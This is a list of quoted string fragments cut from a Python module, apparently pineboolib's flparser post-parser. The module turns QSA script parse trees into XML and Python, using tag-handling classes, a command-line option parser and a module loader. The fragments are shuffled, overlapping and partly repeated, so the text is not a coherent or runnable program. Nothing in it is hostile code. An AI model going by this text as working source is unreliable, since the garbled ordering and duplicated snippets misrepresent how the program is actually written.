"[] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren():",
"\"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"]",
"args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python = False",
"return True # ----------------- def create_xml(tagname): classobj = None for cls in xml_class_types:",
"= [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self",
"= [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class",
"= True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True",
"for arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif",
"value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype ==",
"Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn,",
"add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if",
"self.name = name self.path = path def loadModule(self): fp = None try: description",
"try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname",
"os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in",
"a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear",
"== 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag ==",
"path def loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE) #",
"options.cache: args = [x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\",",
"% (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se quiere guardar",
"Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython:",
"\"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class",
"= [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class",
"exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def main():",
"if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if",
"[\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class",
"#!/usr/bin/python from builtins import str from builtins import object from optparse import OptionParser",
"\"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is",
"subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\",",
"set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other",
"print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue()",
"tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] =",
"\"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"]",
"\":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn,",
"class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags",
"import str from builtins import object from optparse import OptionParser import os import",
"cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id",
"return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return",
"\\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else:",
"= False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other =",
"in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")]",
"class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self,",
"tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn",
"While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags =",
"self.module = imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r",
"tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"]",
"print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No",
"value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname =",
"= ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"]",
". . .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml =",
"\\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s",
"self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject):",
"\"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class",
"[\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject):",
"argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if",
"def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self):",
"= True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True",
"except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text",
"= self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname,",
"getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\"",
"\"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types =",
"= [\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self",
"can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml",
"argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def",
"1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other = False",
"def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject):",
"adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags =",
"= \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def",
"= ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None:",
"\".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\")",
"= True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\",",
"help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\",",
"Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags =",
"args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full =",
"= [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class",
"= False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class",
"0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems) ==",
"\"Parsing File: %-35s . . . . (%.1f%%) \" % (bname, 100.0 *",
"\"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class",
"FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags =",
"print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args",
"name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory):",
"OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\",",
"parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path):",
"argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback",
"lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS",
"path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from",
"python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\",",
"optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\",",
"\"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None:",
"= len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write(",
"[\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self class",
"class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False class TypedObject(ListObject):",
"elif options.topython: from .pytnyzer import pythonize import io if options.cache: args = [x",
"vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn,",
"return def is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj def",
"= value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype",
"str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options,",
"create_xml(tagname) i = 0 for k, v in treedata['content']: if type(v) is dict:",
"= parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist)",
"InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn",
"if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = []",
"tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn ==",
"in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def",
"class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags",
"fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True,",
"for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File:",
"try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython =",
"tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class",
"xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\",",
"= post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s \\n\" %",
"xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\")",
"x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x",
"\"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] =",
"os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename",
"nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s",
"don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def main(): options,",
"[\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname))",
"if cls.can_process_tag(tagname): classobj = cls break if classobj is None: return None return",
"from builtins import str from builtins import object from optparse import OptionParser import",
"import etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS =",
"callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn))",
"in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\")",
"'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject):",
"= NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject):",
"= False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return",
"if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\"",
"== \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname ==",
"= False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False",
"instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i",
"value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None:",
"class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at the end.",
"len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags",
"tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"]",
"ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\"",
"class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True",
"set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other =",
"print(\"Pass 1 - Parse and write XML file . . .\") try: execute(options,",
"+ \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__ == \"__main__\":",
"print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python",
"['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class",
"if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return",
"from optparse import OptionParser import os import os.path import sys import imp import",
"name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue",
"for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is",
"False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class",
"return self.__class__ in listobj or self.astname in listobj def get(self, listobj, default=None): if",
"Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\"",
"execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY file load",
"0 def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class",
"args) def pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist, str):",
"None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML",
"default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file",
"xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\",",
"= [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags =",
"class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list',",
"args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no",
"= [\"constant\"] def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if",
"os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description =",
"subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self,",
"import qsatype for filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath)",
"debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value):",
"else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject):",
"tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags =",
"vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype",
"class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if argn ==",
"[\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0:",
"import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames):",
"class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags",
"to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\")",
"i = 0 for k, v in treedata['content']: if type(v) is dict: instruction",
"self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] =",
"imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero",
"tagname): return tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname):",
"loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE) # description =",
"= stream.getvalue() if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \"",
".\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython",
"Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"]",
"value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1:",
"optparse import OptionParser import os import os.path import sys import imp import traceback",
"OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags =",
"default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\")",
"class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags",
"= {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n]",
"self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values",
"= True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False",
"None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname",
"help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\")",
"bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id =",
"polish(self): if self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags",
"= old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \" % bname",
"in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if",
"bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags",
"write PY file . . .\") try: execute(options, [arg + \".xml\" for arg",
"def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k, v in",
"class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags =",
"%-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog:",
"args) = parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options,",
"if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python = False options.full",
"class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self,",
"= True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options,",
"# Si no se quiere guardar resultado, no hace falta calcular mas continue",
"from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\",",
"\"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\":",
"parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def",
"[\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags =",
"def polish(self): if len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0],",
"args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if",
"tagname): return tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml =",
"class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname =",
"= parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args)",
"parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full = True if",
"return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags",
"argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj or self.astname in",
"False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False class",
"self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data):",
"Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text =",
"= {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n",
"if classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem =",
"class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy()",
"sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \" %",
"convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo",
"vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\",",
"fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not",
"dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug",
"= filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r",
"try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception:",
"= True if options.verbose: print(\"Pass 2 - Pythonize and write PY file .",
"import traceback from lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError:",
"os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File:",
"in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\",",
"= [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in",
"self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return",
"= \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags",
"\" % bname).join(text.splitlines())) else: if options.cache: args = [x for x in args",
"= \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class",
"flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS =",
"----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn",
"= execpython if options.verbose: print(\"Pass 3 - Test PY file load . .",
"% (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try:",
"if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn,",
"# ----------------- def create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname):",
"= 0 for k, v in treedata['content']: if type(v) is dict: instruction =",
"FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False except Exception as",
"in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . .",
"= os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod",
"subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem)",
"\"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn",
"if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if",
"if self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags =",
"0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\":",
"parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False,",
"bname).join(text.splitlines())) else: if options.cache: args = [x for x in args if not",
"% (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr",
"options.toxml: # Si no se quiere guardar resultado, no hace falta calcular mas",
"try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\"",
"parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store",
"ast = post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s \\n\"",
"import pythonize import io if options.cache: args = [x for x in args",
"if len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject): tags =",
"execpython if options.verbose: print(\"Pass 3 - Test PY file load . . .\")",
"= [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0:",
"continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir",
"True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags",
"name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn =",
"if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write(",
